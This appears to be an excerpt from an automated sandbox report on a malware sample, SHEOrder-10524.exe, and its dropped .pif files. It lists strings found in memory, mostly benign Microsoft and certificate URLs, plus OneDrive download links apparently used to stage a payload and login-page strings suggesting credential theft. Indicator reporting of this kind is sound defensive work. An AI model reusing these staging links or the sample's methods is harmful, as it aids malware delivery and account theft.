                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0:
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0H
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0I
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0Q
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://ocsp.msocsp.com0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://ocsp.msocsp.com0S
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://ocspx.digicert.com0E
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0~
                  Source: lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000003.1781518005.000000000091D000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000007.00000003.1781576573.000000000091D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: lhgtogaW.pif, 00000007.00000003.1781518005.000000000091D000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000007.00000003.1781576573.000000000091D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
                  Source: lhgtogaW.pif, 00000005.00000002.1794411249.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: SHEOrder-10524.exe, SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1676709365.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1732244936.0000000014BF0000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000000.1716894021.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif, 00000005.00000000.1778121431.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif, 00000006.00000000.1778301253.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif, 00000007.00000000.1778998992.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif, 0000000A.00000000.1881855840.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif, 0000000E.00000000.1938374574.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif.0.drString found in binary or memory: http://www.pmail.com
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                  Source: Wagotghl.PIF, 00000008.00000003.1882438284.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com/
                  Source: SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com/W
                  Source: Wagotghl.PIF, 00000008.00000003.1882438284.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000002.1885488700.000000000091D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com/y4mFB-7cF0RJhpIN7Sx_6Q1D2DImE5mQPbbhluzK7S-dhQrKxqFk72nhp4k4_SdW3Ee
                  Source: SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com/y4mUNi1irqpVap8qJ_hkhgVkZ9e6GpCglPli4DYI3goIWfA8FsMCycwJbzbnR6k4jns
                  Source: Wagotghl.PIF, 0000000B.00000002.1940504493.0000000000662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com/y4mjSrmVGqdqL8hnH_btf-6Qys453bsv2FyIiEEOlZHaw9haei9AHV5FIa03OCcOV-q
                  Source: Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000651000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000002.1940504493.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com/y4msc3kYI7yGn3gEL_3gJvdpmyEkhOCRDBRFk1eCCUOzN0wBjvROvE3UIu0RkWHiUlu
                  Source: Wagotghl.PIF, 00000008.00000002.1885488700.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000003.1882438284.00000000008EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com:443/y4mFB-7cF0RJhpIN7Sx_6Q1D2DImE5mQPbbhluzK7S-dhQrKxqFk72nhp4k4_Sd
                  Source: SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com:443/y4mUNi1irqpVap8qJ_hkhgVkZ9e6GpCglPli4DYI3goIWfA8FsMCycwJbzbnR6k
                  Source: Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000651000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000002.1940504493.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bnaqzw.sn.files.1drv.com:443/y4msc3kYI7yGn3gEL_3gJvdpmyEkhOCRDBRFk1eCCUOzN0wBjvROvE3UIu0RkWH
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                  Source: SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000003.1882438284.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000002.1885488700.0000000000902000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000651000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000002.1940504493.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: lhgtogaW.pif, 00000005.00000003.1793746944.0000000000A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
                  Source: lhgtogaW.pifString found in binary or memory: https://login.yahoo.com/config/login
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
                  Source: SHEOrder-10524.exe, 00000000.00000002.1719110416.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000002.1884851023.000000000088E000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 00000008.00000003.1882438284.000000000086A000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
                  Source: Wagotghl.PIF, 0000000B.00000002.1949920072.0000000013C5D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/downlo
                  Source: Wagotghl.PIF, 0000000B.00000002.1949920072.0000000013C40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=B24528E77689F9AC%21162&authkey=
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: lhgtogaW.pifString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhv1938.tmp.5.drString found in binary or memory: https://www.office.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
